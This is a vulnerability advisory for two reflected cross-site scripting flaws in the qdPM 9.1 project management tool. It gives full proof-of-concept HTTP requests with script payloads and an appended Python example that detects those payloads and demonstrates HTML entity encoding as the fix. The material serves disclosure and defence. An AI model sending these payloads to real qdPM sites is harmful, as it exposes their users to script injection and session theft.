qdPM 9.1 Cross Site Scripting

2019.02.19
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easily manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET /qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script> HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
===========================================================================================
# Exploit Title: qdPM 9.1 - 'search[keywords]' XSS Injection
# CVE: CVE-2019-8390
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easily manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : search[keywords]
# Attack Pattern : e"><script>zi2u(9111)</script>
# POST Request : http://localhost/qdpm/index.php/configuration
===========================================================================================
POST /qdpm/index.php/users HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9
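Both findings are reflected XSS: the `type` query parameter and the `search[keywords]` form field are echoed into the response without HTML entity encoding. The script below is an added example, not part of the advisory and not qdPM's own code (qdPM is PHP; Python is used here only to model the behaviour). It runs a simple detector over constructed request samples modelled on the two requests above, and contrasts an unsafe verbatim echo of the parameter with the mitigation, `html.escape(..., quote=True)`, which neutralises both payloads because the `<`, `>` and `"` characters they rely on become entities. The request dictionaries, `WATCHED_PARAMS`, `MARKUP_RE` and the two `render_*` helpers are all assumptions of this example.

```python
"""Detection and output-encoding example for the two reflected XSS
parameters described in the advisory (CVE-2019-8391 'type',
CVE-2019-8390 'search[keywords]')."""
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample traffic modelled on the advisory's two requests plus
# two benign requests; these are not captured logs from a real qdPM host.
SAMPLE_REQUESTS = [
    {"method": "GET",
     "target": "/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>",
     "body": ""},
    {"method": "GET",
     "target": "/qdpm/index.php/configuration?type=tasks_columns_list",
     "body": ""},
    {"method": "POST",
     "target": "/qdpm/index.php/users",
     "body": 'search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9'},
    {"method": "POST",
     "target": "/qdpm/index.php/users",
     "body": "search[keywords]=release+notes&search_by_extrafields[]=9"},
]

# Parameters the advisory names as reflected unescaped into the page (assumed list).
WATCHED_PARAMS = {"type", "search[keywords]"}

# Markup that should never arrive in a plain text/search parameter: a tag
# opener, a javascript: URL scheme, or an attribute-closing quote before '>'.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript\s*:|[\"']\s*>", re.IGNORECASE)


def extract_params(request):
    """Return {name: [decoded values]} from the query string and, for POST,
    the form body. parse_qs already URL-decodes once; the extra unquote_plus
    catches double-encoded values such as %253C."""
    params = {}
    query = urlsplit(request["target"]).query
    body = request["body"] if request["method"] == "POST" else ""
    for source in (query, body):
        for name, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(name, []).extend(unquote_plus(v) for v in values)
    return params


def find_xss_attempts(requests):
    """Flag (path, parameter, value) triples where a watched parameter carries markup."""
    hits = []
    for req in requests:
        path = urlsplit(req["target"]).path
        for name, values in extract_params(req).items():
            if name not in WATCHED_PARAMS:
                continue
            for value in values:
                if MARKUP_RE.search(value):
                    hits.append((path, name, value))
    return hits


def render_unsafe(value):
    """Models the vulnerable behaviour: the parameter is echoed verbatim into
    an attribute, so a '">' prefix closes the attribute and the tag."""
    return f'<input name="type" value="{value}">'


def render_safe(value):
    """Mitigation: entity-encode the value (quotes included) before it lands
    inside an attribute or text node; the payload is then displayed, not run."""
    return f'<input name="type" value="{html.escape(value, quote=True)}">'


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_REQUESTS):
        print("XSS attempt:", hit)
    payload = 'e"><script>zi2u(9111)</script>'
    print("unsafe:", render_unsafe(payload))
    print("safe:  ", render_safe(payload))
```

The detector is deliberately narrow: it only inspects the parameters the advisory names, so a benign value like `release notes` is not flagged, while the two proof-of-concept values are. On the application side, entity encoding at the point of output is the fix; stripping `<script>` on input is not, because the attribute-breaking `">` prefix in the second payload shows that the injection context, not the tag name, decides what is dangerous.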


Copyright 2019, cxsecurity.com